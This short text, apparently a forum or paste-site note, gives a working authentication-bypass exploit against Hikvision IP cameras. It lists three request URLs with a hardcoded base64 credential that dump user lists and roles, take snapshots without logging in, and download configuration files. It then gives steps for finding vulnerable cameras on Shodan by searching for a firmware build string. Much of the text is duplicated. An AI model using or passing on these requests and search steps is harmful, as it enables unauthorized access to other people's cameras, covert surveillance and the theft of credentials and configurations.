Retrieve a list of all users and their roles:
http://camera.ip/Security/users?auth=YWRtaW46MTEK
Obtain a camera snapshot without authentication:
http://camera.ip/onvif-http/snapshot?auth=YWRtaW46MTEK
And worst of all, one can download camera configuration:
http://camera.ip/System/configurationFile?auth=YWRtaW46MTEK
----------------------------------------------------------------------------
step -1
search for Hikvision 2015 in shodan
step -2
if u find vuln camera with above query just copy build number and search again in shodan like this :
""Web Version: 3.1.3.150324""
http://camera.ip/Security/users?auth=YWRtaW46MTEK
Obtain a camera snapshot without authentication:
http://camera.ip/onvif-http/snapshot?auth=YWRtaW46MTEK
And worst of all, one can download camera configuration:
http://camera.ip/System/configurationFile?auth=YWRtaW46MTEK
----------------------------------------------------------------------------
step -1
search for Hikvision 2015 in shodan
step -2
if u find vuln camera with above query just copy build number and search again in shodan like this :
""Web Version: 3.1.3.150324""